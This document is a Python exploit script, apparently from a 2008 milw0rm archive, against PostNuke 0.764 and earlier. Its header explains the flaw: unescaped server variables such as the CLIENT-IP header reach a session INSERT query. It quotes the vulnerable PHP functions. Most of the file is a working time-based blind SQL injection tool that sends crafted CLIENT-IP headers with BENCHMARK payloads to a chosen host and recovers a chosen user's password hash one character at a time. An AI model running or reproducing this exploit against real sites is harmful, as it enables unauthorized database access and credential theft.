#!/usr/bin/python
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Postnuke <= 0.764 #
# Blind Sql Injection Vulnerability #
# Benchmark Method #
# #
# Vendor: www.postnuke.com #
# Severity: High #
# Author: The:Paradox #
#=================================================================================================#
# Proud To Be Italian. #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# Postnuke presents a critical vulnerability in pnVarPrepForStore() function. Let's see source: #
# #
# #
# 1. function pnVarPrepForStore() #
# 2. { #
# 3. $resarray = array(); #
# 4. foreach (func_get_args() as $ourvar) { #
# 5. if (!get_magic_quotes_runtime() && !is_array($ourvar)) { #
# 6. $ourvar = addslashes($ourvar); #
# 7. } #
# 8. // Add to array #
# 9. array_push($resarray, $ourvar); #
# 10. } #
# 11. // Return vars #
# 12. if (func_num_args() == 1) { #
# 13. return $resarray[0]; #
# 14. } else { #
# 15. return $resarray; #
# 16. } #
# 17. } #
# #
# This function is used to prepare vars for sql queries. It "add slashes" to given variables. #
# But wat happens if get_magic_quotes_runtime() is On in Server Configuration? #
# The script does nothing 'cause variables should be already cleaned. #
# #
# Whatever the script author didn't thought about Server Variables: they are untouched by #
# magic_quotes_gpc and magic_quotes_runtime(). #
# Therefore all Server Variables are not propelly checked with magic_quotes_runtime() On #
# #
# In this exploit I will inject Sql code in HTTP_CLIENT_IP header, see pnSessionInit() function. #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
"""
Related Codes:
function pnSessionInit()
{
$dbconn =& pnDBGetConn(true);
$pntable =& pnDBGetTables();
// First thing we do is ensure that there is no attempted pollution
// of the session namespace
foreach($GLOBALS as $k => $v) {
if (substr($k,0,4) == 'PNSV') {
return false;
}
}
// Kick it
session_start();
// Have to re-write the cache control header to remove no-save, this
// allows downloading of files to disk for application handlers
// adam_baum - no-cache was stopping modules (andromeda) from caching the playlists, et al.
// any strange behaviour encountered, revert to commented out code.
// Header('Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0');
Header('Cache-Control: cache');
$sessid = session_id();
// Get (actual) client IP addr
$ipaddr = pnServerGetVar('REMOTE_ADDR');
if (empty($ipaddr)) {
$ipaddr = pnServerGetVar('HTTP_CLIENT_IP');
}
$tmpipaddr = pnServerGetVar('HTTP_CLIENT_IP');
if (!empty($tmpipaddr)) {
$ipaddr = $tmpipaddr;
}
$fwdipaddr = pnServerGetVar('HTTP_X_FORWARDED_FOR');
if (!empty($fwdipaddr) AND strpos($fwdipaddr, ',') !== false) {
$fwdipaddr = substr($fwdipaddr,0, strpos($fwdipaddr, ','));
}
$tmpipaddr = $fwdipaddr;
if (!empty($tmpipaddr) AND strpos($tmpipaddr, ',') !== false) {
$ipaddr = substr($tmpipaddr,0, strpos($tmpipaddr, ','));
}
$sessioninfocolumn = &$pntable['session_info_column'];
$sessioninfotable = $pntable['session_info'];
$query = "SELECT $sessioninfocolumn[ipaddr]
FROM $sessioninfotable
WHERE $sessioninfocolumn[sessid] = '" . pnVarPrepForStore($sessid) . "'";
$result =& $dbconn->Execute($query);
if ($dbconn->ErrorNo() != 0) {
return false;
}
if (!$result->EOF) {
// jgm - this has been commented out so that the nice AOL people
// can view PN pages, will examine full implications of this
// later
// list($dbipaddr) = $result->fields;
$result->Close();
// if ($ipaddr == $dbipaddr) {
pnSessionCurrent($sessid);
// } else {
// // Mismatch - destroy the session
// session_destroy();
// pnRedirect('index.php');
// return false;
// }
} else {
pnSessionNew($sessid, $ipaddr);
// Generate a random number, used for
// some authentication
srand((double)microtime() * 1000000);
pnSessionSetVar('rand', rand());
}
return true;
}
function pnSessionNew($sessid='', $ipaddr='')
{
$dbconn =& pnDBGetConn(true);
$pntable =& pnDBGetTables();
$sessioninfocolumn = &$pntable['session_info_column'];
$sessioninfotable = $pntable['session_info'];
$query = "INSERT INTO $sessioninfotable
($sessioninfocolumn[sessid],
$sessioninfocolumn[ipaddr],
$sessioninfocolumn[uid],
$sessioninfocolumn[firstused],
$sessioninfocolumn[lastused])
VALUES
('" . pnVarPrepForStore($sessid) . "',
'" . pnVarPrepForStore($ipaddr) . "', <-- Injection! =)
0,
" . time() . ",
" . time() . ")";
$dbconn->Execute($query);
if ($dbconn->ErrorNo() != 0) {
return false;
}
return true;
}
"""
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
print """
#=================================================================#
# Postnuke <= 0.764 #
# Blind Sql Injection Vulnerability #
# Benchmark Method #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./pwnpn [Target] [Path] [User_id] #
# #
# Example: #
# ./pwnpn localhost /PostNuke/ 2 #
# ./pwnpn www.host.com / 2 #
#=================================================================#
"""
if len(argv)<=3: exit()
else: print "[.]Exploit Starting."
prefix = "pn_"
benchmark = "230000000"
vtime = 6
port = 80
target = argv[1]
path = argv[2]
uid = argv[3]
j=1
h4sh = ""
ht = []
for k in range(48,58):
ht.append(k)
for k in range(97,103):
ht.append(k)
ht.append(0)
# Result Query:
# INSERT INTO pn_session_info( pn_session_info.pn_sessid, pn_session_info.pn_ipaddr, pn_session_info.pn_uid, pn_session_info.pn_firstused, pn_session_info.pn_lastused )
# VALUES ('6bc3cf4c67bb4c3b24bdd38dcd8e1b5b', '127.0.0.1', (SELECT IF((ASCII(SUBSTRING(PASSWORD,1,1))=48),benchmark(300000000, CHAR(0)), 0)
# FROM pn_users WHERE pn_uid =1)/*', 0, 0, 0)
print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
for i in ht:
if i == 0: exit('[-]Exploit Failed.\n')
start = time()
conn = HTTPConnection(target,port)
conn.request("GET", path + "index.php", {}, {"Accept": "text/plain","CLIENT-IP": "127.0.0.1',(SELECT IF((ASCII(SUBSTRING(pn_pass," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE pn_uid=" + uid + "), 0, 0)/*"})
response = conn.getresponse()
read = response.read()
if response.status == 404: exit('[-]Error 404. Not Found.')
now = time()
if now - start > vtime:
stdout.write(chr(i))
stdout.flush()
h4sh += chr(i)
j += 1
break;
print "\n\n[+]All Done.\n-=Paradox Got This One=-"
# milw0rm.com [2008-03-21]
